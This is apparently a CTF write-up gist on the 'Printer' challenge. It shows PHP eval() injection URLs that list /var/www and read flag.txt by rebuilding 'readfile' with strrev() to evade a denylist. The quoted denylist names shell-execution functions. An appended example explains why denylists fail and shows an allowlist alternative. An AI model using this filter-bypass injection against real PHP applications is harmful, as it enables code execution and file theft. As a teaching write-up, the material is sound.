@amiremohamadi
Last active July 13, 2021 14:24
CTF 2021 - Printer challenge solution

Challenge:

http://challenges.ctfd.io:30068/index.php

Solution:

Refer to the source file (index.php):

    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }

These are the blocked words; we have to bypass this blacklist somehow. As you can see, the getcwd() function is not blocked, so we can use it to check the current directory path:

http://challenges.ctfd.io:30068/index.php?print=echo%20getcwd()

It says we're in /var/www/html.

The blacklist contains ../flag.txt, so the flag might be in /var/www (?). We can get the list of files using readdir():

http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27))

The above input gives us the first file/dir inside /var/www. Let's try it with more readdir() calls:

http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();

Wow! flag.txt is right there! How can we read it? All functions related to reading files are blocked (?)

A simple solution is to use strrev(). As we saw in the source file, it uses the eval() function, which just evaluates a string as PHP code. We only need to generate a string that represents the code.

I'm gonna combine readfile() and strrev() to bypass the blacklist. strrev("elifdaer") returns "readfile" at run time, so the blocked word never appears literally in the input:

http://challenges.ctfd.io:30068/index.php?print=chdir(%22/var/www/%22);echo%20getcwd();echo%20readdir(opendir(%22/var/www/%22));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20strrev(%22elifdaer%22)(readdir());&debug=on

Cool! :D
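Why the blacklist fails and what replaces it, as an added example that is not part of the original gist or the challenge's own code: the filter from index.php is wrapped in `denylist_allows()` and compared with a handler that treats the parameter as data and never calls eval(). The function names, the `time` and `version` actions and the sample loop are assumptions made for illustration.

```php
<?php
// Added example. denylist_allows() and handle_print() are hypothetical names.

// The filter shown in index.php, wrapped in a function.
// true means the input would be handed on to eval().
function denylist_allows(string $input): bool
{
    $blocked = ["cat", "more", "readfile", "fopen", "file_get_contents", "file", "SplFileObject"];
    $pattern = '/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i';
    foreach ($blocked as $value) {
        if (strpos($input, $value) || preg_match($pattern, $input)) {
            return false;
        }
    }
    return true;
}

// Allowlist form (assumed feature set): the parameter only selects one of a
// fixed set of actions. Nothing the client sends is evaluated as PHP, so there
// is no function name to hide from a filter.
function handle_print(string $action): string
{
    switch ($action) {
        case 'time':
            $out = gmdate('c');
            break;
        case 'version':
            $out = 'printer 1.0'; // constructed value
            break;
        default:
            return 'rejected';
    }
    return htmlspecialchars($out, ENT_QUOTES, 'UTF-8');
}

// Inputs taken from the write-up above, plus the literal call the filter was written for.
$samples = [
    'echo getcwd()',
    'echo strrev("elifdaer")(readdir());',
    'echo readfile("x")',
];
foreach ($samples as $s) {
    printf("%-40s denylist=%-5s allowlist=%s\n", $s, denylist_allows($s) ? 'pass' : 'block', handle_print($s));
}
printf("%-40s allowlist=%s\n", 'time', handle_print('time'));
```

The denylist matches text, while eval() runs whatever that text computes, so any name assembled at run time is invisible to it. The allowlist handler has no such gap because unknown input is rejected before it can reach an interpreter.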
